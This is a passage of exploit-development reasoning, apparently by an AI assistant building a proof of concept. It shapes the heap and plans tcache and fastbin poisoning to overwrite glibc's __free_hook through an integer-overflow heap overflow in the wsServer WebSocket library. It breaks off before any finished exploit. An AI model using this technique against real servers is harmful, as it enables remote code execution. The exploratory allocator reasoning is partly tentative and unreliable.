  • tcache[1] = {chunk_accept}
  • tcache[7] = {chunk_response}

Now shaping message 1 (32 bytes):

  • msg: malloc(32) → tcache[1] has chunk_accept → msg = chunk_accept. tcache[1] empty.
  • echo: malloc(35) → need 48-byte chunk. tcache[1] empty → from top. chunk_echo1 at top (after chunk_response).
  • free(response_echo) → tcache[1] = {chunk_echo1}
  • free(msg) → tcache[1] = {chunk_accept → chunk_echo1}, count=2

Now the heap is: [freed chunk_str (64)] [freed chunk_accept (48)] [freed chunk_response (144)] [freed chunk_echo1 (48)] [top]

And tcache[1] = {chunk_accept → chunk_echo1}, count=2.

Now exploit:

  • Frame 1 (non-FIN, 32 bytes): malloc(32) → tcache[1] pops chunk_accept. tcache[1] = {chunk_echo1}, count=1.
    • msg = chunk_accept
    • Adjacent to chunk_accept is chunk_response (144 bytes, freed, in tcache[7])

Wait, that's the wrong bin! chunk_response is a 144-byte chunk in tcache[7], not tcache[1].

OK, so the physically adjacent chunk to chunk_accept is chunk_response (144 bytes). But that's in a different tcache bin. If we corrupt its fd, we'd need a 144-byte malloc to drain it, not a 48-byte malloc.

Hmm. Let me reconsider. I need the physically adjacent chunk to be:

  1. In the same tcache bin as the exploit buffer
  2. Free (in tcache)

Alternative approach: What if I don't use the handshake's freed chunks? What if I just send enough shaping messages so that two consecutive chunks from top end up in the right tcache bin?

After the handshake, the heap looks like: [chunk_str freed (64)] [chunk_accept freed (48)] [chunk_response freed (144)] [top]

If I send shaping messages of size 32:

  • Shaping msg 1:

    • malloc(32) → chunk_accept from tcache[1]
    • echo malloc(35) → from top: chunk_E1 (48 bytes)
    • free(echo1) → tcache[1] = {chunk_E1}
    • free(msg1) → tcache[1] = {chunk_accept → chunk_E1}, count=2
  • Shaping msg 2:

    • malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E1}, count=1.
    • echo malloc(35) → from top: chunk_E2 (48 bytes). Physically after chunk_E1!
    • free(echo2) → tcache[1] = {chunk_E2 → chunk_E1}, count=2
    • free(msg2) → tcache[1] = {chunk_accept → chunk_E2 → chunk_E1}, count=3

Wait, chunk_accept was just written back to tcache[1]. And chunk_E1 and chunk_E2 are consecutive from top. After chunk_E2 comes the top chunk.

  • Shaping msg 3:
    • malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E2 → chunk_E1}, count=2.
    • echo malloc(35) → chunk_E1 from tcache[1]. tcache[1] = {chunk_E2}, count=1.
    • free(echo3) → tcache[1] = {chunk_E1 → chunk_E2}, count=2. (chunk_E1 reused!)
    • free(msg3) → tcache[1] = {chunk_accept → chunk_E1 → chunk_E2}, count=3

Hmm, this is getting tangled. Let me think differently.

I need:

  1. Exploit buffer at address X (48-byte chunk)
  2. Free 48-byte chunk at address X+48 (physically adjacent, in tcache[1])

Then overflow from X corrupts the fd pointer of the free chunk at X+48.

To get this layout, I need two consecutive 48-byte chunks from top, then free the second one.

Method:

  • Send enough shaping messages to consume tcache entries so fresh chunks come from top.
  • Send one more shaping message where msg comes from top (chunk A), echo comes from top (chunk B, adjacent to A). Free echo → tcache[1] gets B. Free msg → tcache[1] gets A → B.
  • Now exploit frame 1: malloc(32) gets A from tcache[1]. tcache[1] = {B}, count=1.
  • A is the exploit buffer. B is physically adjacent at A+48. B is free in tcache[1].
  • Overflow from A into B, corrupting B's fd pointer to &__free_hook.
  • Close connection 1 → free(msg_data) frees A → tcache[1] = {A → __free_hook}, count=2.

Then on connection 2:

  • Handshake base64: malloc(31) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.
  • Handshake frees base64: free(A) → tcache[1] = {A → __free_hook}, count=2.

Wait, but during the handshake, base64 is allocated and then freed. So:

  • malloc(31) → gets A. tcache[1] = {__free_hook}.
  • ... do stuff ...
  • free(accept) → frees A. tcache[1] = {A → __free_hook}, count=2.

Then later on connection 2, send a message:

  • msg: malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.
  • echo: malloc(35) → gets __free_hook from tcache[1]!!! tcache[1] empty.
  • Write frame header + payload to __free_hook address!
  • free(response) where response = __free_hook → calls __free_hook(content) → RIP control!

This is the plan! But we need to be careful about what value gets written to __free_hook.

The echo response is constructed in ws_sendframe_internal:

c
response = malloc(sizeof(unsigned char) * (idx_first_rData + length + 1));
...
response[0] = (WS_FIN | type);  // 0x82 for binary
response[1] = length & 0x7F;    // payload length (if <= 125)
...
for (i = 0; i < length; i++)
    response[idx_response++] = msg[i];
response[idx_response] = '\0';

So response[0] = 0x82, response[1] = payload_length. These overwrite the first 2 bytes of __free_hook.

Then free(response) is called with response pointing to __free_hook. If __free_hook is set to a value, free() will call that value with the response pointer as argument. But __free_hook hasn't been set yet! We're WRITING to __free_hook memory, not setting it as a function pointer.

Wait, I'm confusing things. The tcache poisoning makes malloc() return a pointer TO __free_hook (the variable in libc .bss). We then write our frame data TO that address. The frame data overwrites __free_hook's value.

So after the echo malloc(35) returns &__free_hook:

  • response = &__free_hook
  • response[0] = 0x82 (overwrites byte 0 of __free_hook)
  • response[1] = payload_len (overwrites byte 1)
  • response[2..2+msg_len-1] = msg content (overwrites bytes 2+)

So __free_hook's value becomes: the 8 bytes written starting at response[0].

For a 32-byte binary message:

  • response[0] = 0x82 (FIN=1, opcode=2)
  • response[1] = 0x20 (length=32)
  • response[2..33] = msg[0..31] (our payload content)
  • response[34] = '\0'

__free_hook is at a fixed address. Its VALUE (which is a function pointer) gets overwritten with:

  • bytes 0-1: 0x82, 0x20
  • bytes 2-7: first 6 bytes of our message content

On little-endian x86_64, the function pointer value would be: 0x??????????20_0082 where ?????????? are our controlled bytes (from msg[0..5]).

For the PoC, we just need to show RIP control. Any crash at a controlled address is sufficient. So if we send a message with content like 0x4141414141414141..., __free_hook becomes 0x4141414141412082 (or similar).

But actually, we can be smarter. We need the response to be exactly sizeof(unsigned char) * (idx_first_rData + length + 1) bytes. For length <= 125, idx_first_rData = 2. So malloc(2 + length + 1). For this to be a 48-byte chunk: need request2size(2 + length + 1) = 48, so length + 3 must be 25-40, meaning length = 22-37.

If we use length=32: malloc(35) → 48-byte chunk → tcache[1]. Good.

Now, after the echo writes to __free_hook, __free_hook = some value we partially control. Then free(response) is called. Since __free_hook is now set, free() calls __free_hook(response), which is our_value(response).

For a pure PoC, we just need the crash at a controlled RIP. So __free_hook can be any invalid address.

But wait - there's a subtlety. The response variable in ws_sendframe_internal points to the address returned by malloc, which is &__free_hook. So free(response) = free(&__free_hook). And __free_hook is called with &__free_hook as argument. But by this time, __free_hook's VALUE has been overwritten by the frame header + content.

So: __free_hook(&__free_hook) where __free_hook = 0x??????????2082 (for 32-byte payload). RIP will be 0x??????????2082. This proves control.

But we CAN do better. If we use a payload size where the frame header doesn't corrupt the address too badly, or if we find a way to write a clean address...

Actually, the frame header is always 2 bytes (for length <= 125). So bytes 0-1 of __free_hook are always corrupted by the frame header. We can't avoid this for response sizes that use a 2-byte header.

But for the PoC, 0x??????????2082 is already RIP control! We just need to show the crash.

Wait, actually I should reconsider. The echo writes response content to response, which is &__free_hook. But response is a pointer to unsigned char. So:

  • response[0] = frame[0] = 0x82 → byte at &__free_hook
  • response[1] = frame[1] = length → byte at &__free_hook + 1
  • response[2..2+length-1] = msg[0..length-1] → bytes at &__free_hook + 2 onwards

On x86_64 little-endian, __free_hook is an 8-byte function pointer. The value is loaded as:

  • byte 0 (LSB) = 0x82
  • byte 1 = length (e.g., 0x20 for 32)
  • bytes 2-7 = msg[0..5]

So __free_hook = msg[5]<<56 | msg[4]<<48 | msg[3]<<40 | msg[2]<<32 | msg[1]<<24 | msg[0]<<16 | 0x2082

We control bytes 2-7 (msg[0..5]). For system at 0x7ffff7e01290, we'd need:

  • byte 0 = 0x90 → but frame header forces 0x82. Not possible directly.

So we can't cleanly set __free_hook to system(). But for the PoC, we just need to prove RIP control. We can set msg[0..5] to something recognizable like \x41\x41\x41\x41\x41\x41 and show RIP = 0x4141414141412082.

Actually wait, I realize we should think about this more carefully. The critical path is:

After corrupting tcache[1] so that B.fd = &__free_hook:

  1. Connection 2 handshake: base64_encodemalloc(31) → gets... hmm, which chunk?

Actually, the tcache[1] state after the overflow on connection 1 depends on what exactly we overwrite. Let me reconsider.

After shaping and before exploit:

  • tcache[1] = {B} (count=1)
  • Exploit frame 1: malloc(32) → gets A from tcache[1]. Wait, no. After shaping msg 2 frees, tcache[1] has {A, B, ...}. Let me re-trace.

OK, I think the cleanest approach is:

Pre-conditions:

  • After shaping, tcache[1] has at least 2 entries, with A (from top) and B (adjacent, from top) being the last two added.

Exploit:

  1. malloc(32) for exploit frame 1 → gets the most recently freed chunk (let's call it A). tcache[1] now has B at head.
  2. A is our exploit buffer. B is physically adjacent at A+48, free in tcache[1].
  3. Overflow from A writes into B, overwriting B's fd with &__free_hook.
  4. tcache[1] now: B → __free_hook (count=1)

Wait, but tcache counts. When we popped A, count went from 2 to 1. B is still in tcache with count=1. After corrupting B's fd: tcache[1] = {B → __free_hook}, count=1.

  1. Connection 1 close → free(msg_data) = free(A). A goes to tcache[1]: {A → B → __free_hook}, count=2.

Wait, but A was the overflow buffer. After the overflow, the server hit the error path and called free(fsd.msg_data) at line 1713. That frees A. But A is still "valid" (it was allocated). So free(A) → tcache[1] = {A → B → __free_hook}, count=2.

Hmm, but after the overflow, next_byte() returns -1 (socket EOF), so read_single_frame returns -1, the loop breaks, and free(fsd.msg_data) is called at line 1713. That's free(A). Then the error propagates up, onclose is called, and the thread exits.

So after connection 1 closes:

  • tcache[1] = {A → B → __free_hook}, count=2

But B's fd is corrupted. When the next malloc(31) pops A, tcache[1] = {B → __free_hook}, count=1. Then the next malloc(31) pops B, tcache[1] = {__free_hook}, count=0.

But wait, in the connection 2 handshake, base64_encode does malloc(31) which gets A. Then free(accept) = free(A) puts A back: tcache[1] = {A → __free_hook}, count=1.

Then in the connection 2 echo path:

  • msg: malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=0.
  • echo: malloc(35) → gets __free_hook!!! Writes frame data there.
  • free(response) → response = __free_hook pointer. Since __free_hook was overwritten, __free_hook(response) is called → RIP control!

Wait, but there's a problem. The free(response) is called in ws_sendframe_internal. At that point, __free_hook has been overwritten by the echo's malloc returning its address and the subsequent write. But __free_hook was 0 (NULL) before. After the echo writes to it, it becomes the frame header + msg content.

Actually wait, free(response) is called at line 687. By this point, response points to __free_hook's memory location. The content of __free_hook has been overwritten. So when free(response) is called:

  1. glibc's free() checks __free_hook
  2. __free_hook is now 0x??????????2082 (not NULL)
  3. free() calls __free_hook(response) = 0x??????????2082(&__free_hook)
  4. This crashes because 0x??????????2082 is not a valid function address

SIGSEGV! RIP = 0x??????????2082. RIP control proven!

Now, for an even better demo, we could try to set __free_hook to system() or exit() for a cleaner crash. But the frame header corrupts the low 2 bytes. So we'd need:

  • For system = 0x7ffff7e01290: we'd need byte 0 = 0x90, but it's forced to 0x82. Can't do it.
  • Unless we use a different message length that happens to produce a useful value.

Actually, for the PoC, just crashing at a controlled address is enough. We can set msg[0..5] to recognizable bytes and demonstrate RIP = that value.

But actually, there might be a way to write a clean value. What if we use a message that triggers a 10-byte frame header (for 64-bit length)? Then the frame header is 10 bytes, overwriting all 8 bytes of __free_hook.

For a length >= 65536: idx_first_rData = 10, so response = malloc(10 + length + 1). For this to be a 48-byte chunk: request2size(10 + length + 1) = 48, so 10 + length + 1 must be 25-40, meaning length = 14-29. But length must be >= 65536 for 10-byte header. Contradiction!

So 10-byte header isn't possible for 48-byte chunks. The 2-byte header is what we get.

We could also consider a message with 4-byte header (16-bit length, 126-65535): idx_first_rData = 4, so malloc(4 + length + 1). For 48-byte chunk: length + 5 in 25-40, so length = 20-35. But length must be 126-65535 for 4-byte header. Contradiction again.

So with 48-byte chunks, we always get a 2-byte header that corrupts the low 2 bytes of __free_hook.

For the PoC, this is fine. Let me plan the implementation.

Now let me also think about whether free(msg_data) on connection 1's error path will cause issues. After the overflow, msg_data = A (the exploit buffer). The overflow wrote past A, corrupting B's metadata. When free(A) is called:

  • A's chunk metadata (at A-16) should still be intact (we only wrote past A+32, which is past A's 48-byte boundary... wait, let me check).

Actually, A is a 48-byte chunk. User data starts at A (which is chunk+16). User data is 32 bytes (48 - 16). The overflow starts at msg[f1sz] where f1sz=32. So the overflow starts right at the boundary of A's user data! The first byte of the overflow goes into the next chunk's prev_size.

So A's own chunk metadata (prev_size and size at A-16) is untouched. Only the adjacent chunks are corrupted. free(A) should work fine because:

  1. tcache checks: tc_idx = 1, tcache->counts[1] < 7, so tcache_put(A) succeeds.
  2. No integrity checks on the freed chunk itself in tcache_put.

Good. So the plan is solid.

Let me also think about whether the free(msg_data) at line 1713 actually happens before or after the tcache is poisoned. The sequence is:

  1. Frame 1: malloc(32) → A. Write 32 bytes to A[0..31]. All good.
  2. Frame 2: overflow. Write starts at A[32], goes into B. Corrupts B's fd.
  3. next_byte() returns -1 (EOF from our closed socket).
  4. read_single_frame returns -1.
  5. Loop breaks.
  6. free(fsd.msg_data) = free(A) → A goes to tcache[1].
  7. Error propagates, onclose called, thread exits.

After step 6: tcache[1] = {A → B → __free_hook} (A was pushed to head, B was already there with corrupted fd, count goes to 2).

Wait, actually tcache[1] before step 6 was: {B → __free_hook}, count=1. After free(A): tcache[1] = {A → B → __free_hook}, count=2.

But does tcache_put(A) check A's fd? No, it just sets A->next = tache->entries[1], then tcache->entries[1] = A. So A->next = B. And B->next was corrupted to __free_hook.

So the chain is: A → B → __free_hook. Correct!

Now for connection 2:

  • Handshake: malloc(31) → gets A from tcache[1]. count=1. tcache[1] = {B → __free_hook}
  • Handshake continues...
  • free(accept) = free(A) → tcache_put. count=2. tcache[1] = {A → B → __free_hook}

Now send a message on connection 2:

  • msg: malloc(32) → gets A from tcache[1]. count=1. tcache[1] = {B → __free_hook}
  • echo response: malloc(35) → gets B from tcache[1]. count=0. tcache[1] = {__free_hook}

Hmm wait, that's wrong. After getting B, tcache[1] should be {__free_hook}, count=0. But actually, count was 1 when we popped B, so it goes to 0. And the head becomes B->next = __free_hook.

Actually, tcache works like this:

c
// tcache_get
tcache->entries[tc_idx] = e->next;  // head = B->next = __free_hook
--(tcache->counts[tc_idx]);  // count = 0
return e;  // returns B

So after getting B: tcache[1] = {__free_hook}, count=0. But the entry IS __free_hook, and count is 0. Can we still get it?

In glibc 2.31, tcache_get checks tc_idx < mp_.tcache_bins && tcache && tcache->entries[tc_idx] != NULL. It does NOT check counts! So even with count=0, if entries[tc_idx] is non-NULL, it will be returned.

Wait, actually I need to double-check. Let me look at the glibc 2.31 source:

c
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > (void *) 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;

And in __libc_malloc:

c
if (tc_idx < mp_.tcache_bins
    /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
    && tcache
    && tcache->entries[tc_idx] != NULL)
  {
    return tcache_get (tc_idx);
  }

Yes! It only checks entries[tc_idx] != NULL, not counts. So even with count=0, if the entry pointer is non-NULL, it's returned. The count becomes -1 (underflow), but that's fine for exploitation.

So after getting B for the echo response:

  • tcache[1] = {__free_hook}, count=0 (will underflow to -1 on next get, but unsigned... it'll be a very large number. Doesn't matter.)

Then, the echo response writes to B. B is a legitimate chunk, so that's fine. Then free(response) = free(B). This goes to tcache_put. tcache[1] = {B → __free_hook}, count=1.

Wait, but free(B) checks tcache->counts[tc_idx] < mp_.tcache_count (which is 7 by default). Count is 0, which is < 7, so tcache_put succeeds. tcache[1] = {B → __free_hook}, count=1.

Hmm, but we've made no progress. We got B back, not __free_hook.

I think the issue is that connection 2's echo is the FIRST malloc on that thread's connection. But connection 2 has its OWN thread, which means... does each thread have its own tcache?

On glibc 2.31, tcache is per-thread! Each thread has its own tcache_perthread_struct. So connection 2's thread has an EMPTY tcache[1]!

This is a critical issue. The tcache we poisoned is connection 1's thread tcache. Connection 2 runs in a different thread with its own tcache.

Wait, but is this actually true? Let me reconsider. The wsServer creates a new thread per connection (ws_establishconnection runs in a thread). So connection 1 and connection 2 are in different threads, each with their own tcache.

So tcache poisoning from connection 1's thread does NOT affect connection 2's thread's tcache. This is a major problem.

But wait, the chunks we freed are in the ARENA, not just tcache. When tcache is full (7 entries), further frees go to the arena's fastbins. But we're dealing with tcache, not fastbins.

Hmm, but there's only one main arena (well, one arena per thread, but they share the same heap). Actually, on glibc 2.31, threads can have their own arenas, and tcache is per-thread.

But our GDB run showed the chunk had the NON_MAIN_ARENA flag set, meaning it's in a thread arena. Each arena has its own locks and chunk management.

So the tcache poisoning approach has a fundamental problem: we're poisoning connection 1's thread tcache, but we need connection 2's thread to hit it.

Wait, let me reconsider. Are there ways around this?

  1. Same connection: Instead of two connections, do everything on one connection. After the overflow, we need the SAME thread to do another malloc of the right size.

But on connection 1, after the overflow, the server hits the error path and calls free(msg_data), then onclose, then the thread exits. No more mallocs.

Unless... we can make the server NOT error out after the overflow. But the overflow triggers because next_byte() returns -1 (we close the socket). If we DON'T close the socket, the write loop keeps going (writing our overflow data). After the write loop, the frame is complete (FIN=1), and next_complete_frame returns with the message. Then onmessage is called, which does ws_sendframe_bcastmalloc(response). That malloc would be on the SAME thread!

Wait, this is a much better approach! Let me re-read the write loop:

c
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
    cur_byte = next_byte(wfd);
    if (cur_byte == -1)
        return (-1);
    msg[*msg_idx] = cur_byte ^ masks[i % 4];
}

The write loop reads one byte at a time via next_byte(). It writes fsd->frame_length bytes (which is huge, ~2^64). After writing our overflow bytes, it needs MORE bytes from the socket. If we close the socket, next_byte() returns -1, and the loop exits.

But what if we send exactly the right number of overflow bytes and then... we can't send 2^64 bytes. The loop will always hit EOF.

Unless we change the approach. What if we make the overflow length smaller? Instead of 2^64-11, what if we use a length that wraps to a small value but the actual overflow is just a few dozen bytes?

The current setup:

  • Frame 1: non-FIN, f1sz bytes
  • Frame 2: FIN continuation, length = 5 - f1sz (mod 2^64)
  • frame_size = f1sz + length = 5 (mod 2^64) → passes check
  • realloc(msg, f1sz + length + 1) = realloc(msg, 6) → tiny, same pointer
  • Write loop writes length bytes starting at msg[f1sz]

But length = 5 - f1sz = 5 - 16 = 0xFFFFFFFFFFFFFFF5 for f1sz=16. That's way too many bytes.

What if f1sz = 4 and length = 1? Then frame_size = 5, realloc(msg, 6), write loop writes 1 byte. No overflow.

The problem is that to overflow, we need length to be huge (wrapping around). And the write loop tries to read length bytes, which will always hit EOF.

So on a single connection, after the overflow, the server always errors out. The thread exits. No more mallocs on that thread.

OK so we're back to the cross-thread problem. Let me think about alternatives:

Alternative 1: Use the main arena's fastbins instead of tcache

Fastbins are per-arena, not per-thread (well, each thread has its own arena, but the main arena is shared). Actually no, fastbins are also per-arena.

Hmm, but on glibc 2.31, the first thread uses the main arena. Additional threads may use the main arena too (if it's not locked) or get their own arena.

Actually, the NON_MAIN_ARENA flag we saw suggests the chunk was in a thread arena. But if multiple connections share the same arena, then the fastbins are shared.

Let me think about this differently. In practice, for the PoC:

  • Connection 1 runs in thread T1
  • Connection 2 runs in thread T2
  • If T1 and T2 use the SAME arena, then the tcache poisoning doesn't help (different tcache), BUT fastbin poisoning COULD help (shared fastbins)

But actually, tcache takes priority over fastbins. When we free a chunk, it goes to the current thread's tcache first. When we malloc, the current thread's tcache is checked first. So even if the chunk is in a shared arena, the per-thread tcache intercepts it.

This means that for tcache poisoning to work cross-thread, we'd need to corrupt the other thread's tcache. But the other thread's tcache struct is in a different heap allocation.

Wait, what if we can overflow into ANOTHER thread's tcache_perthread_struct? That seems very unlikely with our fixed overflow pattern.

Alternative 2: Make the write loop succeed

What if instead of having the write loop hit EOF, we make it succeed by providing enough data? The frame length is huge, but next_byte() reads from a 2048-byte buffer. If we fill the buffer, the loop writes 2048 bytes, then next_byte() tries to read more from the socket.

But fsd->frame_length is ~2^64. We can't send that many bytes. The loop will hit EOF.

Unless... we modify the approach so that the write loop only overwrites a small number of bytes.

Wait, what about a different exploitation path? Instead of using the continuation frame integer overflow, what if we look at the error path more carefully?

Actually, let me reconsider the approach. What if we DON'T close connection 1 after the overflow? Instead:

  1. Overflow corrupts adjacent chunk's fd
  2. next_byte() returns -1 → read_single_frame returns -1
  3. free(fsd.msg_data) at line 1713 → frees A → tcache[1] = {A → B_corrupted → __free_hook}
  4. Error propagates to next_complete_frame, returns -1
  5. ws_establishconnection calls onclose, then closes the connection
  6. Thread T1 exits

All of this is on T1's thread. The poisoned tcache is T1's tcache. T1 exits, and its tcache is gone.

Hmm, but is the tcache_perthread_struct freed when the thread exits? Let me think... The tcache_perthread_struct is allocated via malloc() on thread creation (in __libc_malloc's tcache initialization). When the thread exits, the struct is NOT freed - it remains in the heap. But subsequent threads will create their OWN tcache structs.

So even though the poisoned chunks are in the heap, the new thread's tcache is fresh and won't see them.

Alternative 3: Use fastbins instead of tcache

If we fill up the tcache (7 entries) for the target bin, subsequent frees go to fastbins. Fastbins are part of the arena, not per-thread. If T1 and T2 share the same arena, then fastbin poisoning would work cross-thread.

But do T1 and T2 share the same arena? On glibc 2.31, by default, the main thread uses the main arena. Other threads may use the main arena or create their own. The number of arenas is limited (mp_.arena_max). For a simple program like our echo server with only 2 concurrent threads, they likely share the same arena.

But we saw the NON_MAIN_ARENA flag. This means the chunk was NOT in the main arena. So T1 used a non-main arena. If T2 also uses the same non-main arena, they share fastbins.

Hmm, this is getting very complex. Let me reconsider.

Actually, wait. Let me re-examine the GDB output from the previous session. The summary says:

  • Chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)
  • NON_MAIN_ARENA flag set

The address 0x7ffff0000c60 is in the mmap region (high address), which is where thread arenas are allocated. So yes, it's in a thread arena.

But actually, looking more carefully: thread arenas on glibc 2.31 are created via mmap(), and each arena has its own heap segment. The arena pointer is stored in the thread-local thread_arena variable.

For our exploit, the question is: does connection 2's thread use the same arena as connection 1's thread?

Connection 1's thread exits before connection 2's thread starts. When a thread exits, its arena may be reused by a new thread. Specifically, on glibc 2.31, freed arenas are placed on a free list and reused.

So it's very likely that connection 2's thread reuses connection 1's arena! This means they share the same fastbins.

But we still have the tcache problem: connection 2 has a fresh tcache.

Alternative 4: Fill tcache + use fastbins

The plan:

  1. On connection 1, fill tcache[1] to capacity (7 entries)
  2. Further frees of 48-byte chunks go to the arena's fastbin for size 48
  3. Shape the heap so a free fastbin chunk is adjacent to our exploit buffer
  4. Overflow corrupts the fastbin chunk's fd
  5. Connection 1 exits, connection 2 starts
  6. Connection 2 reuses the same arena
  7. Connection 2's mallocs first drain its own tcache (empty), then check fastbins
  8. The corrupted fastbin entry gives us an arbitrary write

This is more complex but feasible. Let me think about the details.

Actually, there's an even simpler approach.

Alternative 5: Same thread, use the echo on a different connection

The echo server uses ws_sendframe_bcast, which broadcasts to ALL connections on port 8080. This means if we have connection 1 and connection 2 both open, a message on connection 1 triggers a broadcast to ALL connections. But the malloc(response) and free(response) in ws_sendframe_internal happen on connection 1's thread.

What if we reverse the order? Connection 2 sends a legitimate message. The malloc(msg) happens on connection 2's thread. Then onmessagews_sendframe_bcastmalloc(response) on connection 2's thread. The broadcast sends to connection 1 (among others), but the malloc/free of the response buffer is on connection 2's thread.

Hmm, this doesn't help with cross-thread tcache.

Alternative 6: Single connection, use the echo path

Wait, I just realized something. The overflow happens during read_single_frame, which is called from next_complete_frame. The error path at line 1713 frees fsd.msg_data. But BEFORE the error path, the write loop returns -1 when next_byte() fails.

What if instead of having the write loop fail, we provide EXACTLY the overflow bytes we need and then close the connection? The write loop will write our overflow data and then fail on the next next_byte(). The key question is: how many bytes does the write loop write before failing?

The write loop iterates fsd->frame_length times. For f1sz=16, frame_length = 0xFFFFFFFFFFFFFFF5. The loop needs to read 0xFFFFFFFFFFFFFFF5 bytes from the socket. We provide some overflow bytes (say 48), then close. The loop writes 48 bytes of our data, then hits EOF.

Actually, wait. The write loop reads from the socket via next_byte(), which buffers up to 2048 bytes at a time. If we sent all our data in one TCP segment, next_byte() would first buffer up to 2048 bytes, then serve them one by one. After consuming the buffer, the next next_byte() call tries to recv() from the socket. If we closed the socket, recv() returns 0 (EOF) or -1 (error), and next_byte() returns -1.

So the write loop writes as many bytes as we send, then fails. The overflow is exactly the number of extra bytes we send (minus the frame 1 data that goes into the legitimate buffer space).

But the problem remains: after the loop fails, the function returns -1, free(msg_data) is called, and the thread exits. No more mallocs on this thread.

Unless... what if there's a way to make the server survive the error and continue processing?

Looking at the code:

c
// Line 1710-1716
if (wfd->error)
{
    free(fsd.msg_data);
    wfd->msg = NULL;
    return (-1);
}

The error flag is set and the function returns -1. Back in ws_establishconnection:

c
while (next_complete_frame(&wfd) >= 0)
{
    // process message
    free(wfd.msg);
}
// onclose, cleanup...

The while loop exits. No more processing. Thread exits.

Alternative 7: Overflow into the tcache_perthread_struct itself

What if we can overwrite the tcache_perthread_struct of the current thread? This struct is allocated at thread creation time and contains the counts and entry pointers for all tcache bins.

If we can locate the tcache_perthread_struct relative to our overflow buffer, we can directly modify tcache entries. This would let us set any tcache bin's entry pointer to __free_hook, and the NEXT malloc on that thread would return it.

But wait, the tcache_perthread_struct for thread T1 is allocated during the first malloc in T1. The first malloc in T1 happens during the handshake (the calloc(61) in get_handshake_accept). So the tcache struct is allocated early, possibly far from our exploit buffer.

Actually, on glibc 2.31, the tcache_perthread_struct is allocated with malloc(sizeof(tcache_perthread_struct)). The size is: TCACHE_MAX_BINS * sizeof(tcache_entry *) + TCACHE_MAX_BINS * sizeof(char). For 64 bins: 64 * 8 + 64 * 1 = 576 bytes. So malloc(576) → chunk size ~592.

This is a large allocation that would be placed at the start of the thread arena's heap. Our exploit buffer comes later. So we'd need to overflow BACKWARDS, which we can't do.

Or... can we? Our overflow goes forward from the exploit buffer. If the tcache struct is before our buffer in memory, we can't reach it.

Actually, the tcache struct is the FIRST allocation in a new thread arena. It's allocated at the start of the heap segment. Our exploit buffer comes much later. So no, we can't overflow into it.

Alternative 8: Use the arena's bins directly (non-tcache path)

On glibc 2.31, the allocation path is:

  1. Check tcache
  2. Check fastbin
  3. Check small/large bin
  4. Check unsorted bin
  5. Split from top

The free path is:

  1. Check tcache (if not full, put in tcache and return)
  2. Check fastbin (if small enough, put in fastbin)
  3. Consolidate and put in unsorted bin

For cross-thread exploitation:

  • Each thread has its own tcache
  • Fastbins are per-arena
  • If threads share the same arena, fastbins are shared

So if we can:

  1. Fill connection 1's tcache[1] to capacity (7 entries)
  2. Free an 8th 48-byte chunk → goes to fastbin (arena-level)
  3. Overflow corrupts this fastbin chunk's fd
  4. Connection 2 reuses the same arena
  5. Connection 2's tcache[1] is empty, so it checks fastbin → finds our corrupted entry

This would work! But we need to be more careful with fastbin poisoning because glibc 2.31's fastbin allocator checks the size field:

c
if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
{
    errstr = "malloc(): memory corruption (fast)";
}

So the target address (where fd points) must have a valid size field at offset +8 that matches the fastbin index. __free_hook is in libc's .bss, which is likely zeroed. A zero size would be fastbin_index(0) = -1 or some invalid index. So we can't directly target __free_hook via fastbin.

But we can use the double-free technique or the fastbin -> smallbin technique. Or we could target a location where we can control the size field.

Actually, on glibc 2.31 with no protections (no PIE, no ASLR, no RELRO), we could target a location in the binary's .bss where we can control the size field. Or we could use the __malloc_hook approach (but __malloc_hook doesn't have a size check issue because it's checked differently).

Wait, actually __malloc_hook was deprecated in glibc 2.34, so on 2.31 it's still available. And __malloc_hook is checked in __libc_malloc BEFORE tcache, fastbin, etc. So even if the allocation path goes through tcache/fastbin, __malloc_hook is called first.

Hmm, but __malloc_hook is called at the START of malloc, not when returning a specific chunk. So we can't use __malloc_hook directly for arbitrary write. We'd still need to redirect the allocation to __free_hook memory, then free() would trigger the hook.

Actually, __malloc_hook is called like this:

c
void *(*hook) (size_t, const void *) = atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
{
    (*hook)(bytes, RETURN_ADDRESS (0));
    ...
}

So if we could set __malloc_hook to system, then malloc would call system(size). But we can't set __malloc_hook directly without an arbitrary write primitive.

OK, I think the cleanest approach for the PoC is:

Use fastbins with a fake chunk at a known address.

Here's the plan:

  1. On connection 1, fill tcache[1] with 7 entries (48-byte chunks)
  2. Shape the heap so a free fastbin chunk is adjacent to the exploit buffer
  3. Overflow corrupts the fastbin chunk's fd to point to a location with a fake size of 0x30 (48 bytes)
  4. On connection 1's thread, the error path calls free(msg_data) → this goes to tcache (still room? Let me check)

Hmm, if tcache already has 7 entries, free(msg_data) would go to fastbin instead of tcache. But msg_data is the exploit buffer itself, not the adjacent corrupted chunk. The corrupted adjacent chunk is already in the fastbin (we freed it before the overflow).

Wait, let me reconsider. The flow would be:

  1. Shape: allocate and free 48-byte chunks to fill tcache[1] (7 entries)
  2. The 8th free goes to fastbin
  3. Then... we need the exploit buffer adjacent to the fastbin chunk

This is getting complicated. Let me step back and think about the SIMPLEST possible approach.

Simplest approach: Use __free_hook write on the SAME thread.

Can we somehow get a malloc on the same thread AFTER the overflow?

Looking at the code flow after the overflow:

  1. Write loop fails → read_single_frame returns -1
  2. next_complete_frame: free(fsd.msg_data) → error, returns -1
  3. ws_establishconnection: while loop exits, calls onclose
  4. onclose in echo.c: ws_getaddress(client) → returns static buffer, no malloc
  5. close_client → closes socket, no malloc
  6. Thread exits

No mallocs after the overflow on the same thread.

What about BEFORE the error? After frame 1 (non-FIN) completes successfully, the do-while loop continues to frame 2 (the exploit frame). Between frames, there's no malloc.

